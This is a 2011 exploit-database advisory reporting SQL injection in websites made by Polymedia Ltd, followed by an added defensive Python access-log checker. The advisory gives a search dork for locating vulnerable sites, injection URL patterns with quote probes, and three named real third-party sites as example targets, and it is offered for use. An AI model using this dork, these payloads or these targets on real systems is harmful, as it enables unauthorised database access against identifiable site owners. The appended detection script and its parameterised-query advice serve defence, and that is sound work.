Polymedia Ltd. SQL injection Vulnerability



EKU-ID: 546
CVE:
OSVDB-ID:
Author: CriminalCoder
Published: 2011-06-17
Verified: Not Verified


=====================================
[+] Exploit Title : Polymedia Ltd. SQL injection Vulnerability
[+] Author : CriminalCoder
[+] Category : WebApps
[+] d0rk : "Website by Polymedia Ltd." "inurl:php?="
[+] Vendor : http://www.polymedia-bg.com/
[+] Twitter : http://twitter.com/CriminalCoder
[+] Live Contact : criminalcoder@hotmail.de
[+] Tested on : Windows XP SP3

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[+]   Exploit:

››http://localhost/front/news_details.php?*={valid id}
››http://localhost/front/details.php?*={valid id}
››http://localhost/front/index.php?*={valid id}

Check all .php?*= parameters: nearly all are vulnerable to SQL injection.

››http://localhost/front/news_details.php?*=' > {sql error}
››http://localhost/front/details.php?*= sql here

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[+]   Example:

››http://transfer.bg/front/details.php?prod_id=4'
››http://mpd-bg.com/front/news_details.php?id=2'
››http://www.historymuseumplovdiv.org/front/index.php?tid=10'

Good Luck aLL :)

=========greetz to===========
KnocKout ~ TechnicaL ~ NosleeP++ ~
Redd.é ~ SanaLtahriP ~ TheMirkin ~
DeadMaster ~ and all my friends...
==========================
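
Added example (not part of the original advisory and not vendor code): a defensive access-log check for the request pattern described above, flagging requests to /front/*.php whose id-style parameter is not a plain integer. The log lines are constructed, and treating any parameter name ending in "id" as numeric is an assumption based on the prod_id, id and tid parameters shown in the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines; client addresses are documentation ranges.
SAMPLE_LOG = """\
198.51.100.7 - - [17/Jun/2011:10:01:02 +0000] "GET /front/details.php?prod_id=4 HTTP/1.1" 200 5120
198.51.100.9 - - [17/Jun/2011:10:01:09 +0000] "GET /front/details.php?prod_id=4' HTTP/1.1" 200 812
198.51.100.9 - - [17/Jun/2011:10:01:15 +0000] "GET /front/news_details.php?id=2%27 HTTP/1.1" 200 790
203.0.113.4 - - [17/Jun/2011:10:02:00 +0000] "GET /front/index.php?tid=10&lang=bg HTTP/1.1" 200 9001
203.0.113.4 - - [17/Jun/2011:10:02:30 +0000] "GET /images/logo.png?id=x HTTP/1.1" 200 300
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST|HEAD) (\S+) [^"]*"')
FRONT_PHP_RE = re.compile(r"^/front/[^/]+\.php$")  # script location named in the advisory
INT_RE = re.compile(r"[0-9]+")                      # what a valid id is assumed to look like


def find_suspect_requests(log_text):
    """Return (client, timestamp, path, param, value) for every id-style parameter
    on /front/*.php whose URL-decoded value is not a plain non-negative integer."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        client, when, target = m.groups()
        url = urlsplit(target)
        if not FRONT_PHP_RE.match(url.path):
            continue
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            # Assumption: parameters named id, prod_id, tid, ... carry numeric ids.
            if name.lower().endswith("id") and not INT_RE.fullmatch(value):
                hits.append((client, when, url.path, name, value))
    return hits


if __name__ == "__main__":
    for hit in find_suspect_requests(SAMPLE_LOG):
        print("non-integer id parameter:", hit)
```

Log review of this kind only shows that the parameters are being probed; the fix belongs in the PHP handlers, which should validate each id as an integer and pass it to the database through a parameterised query.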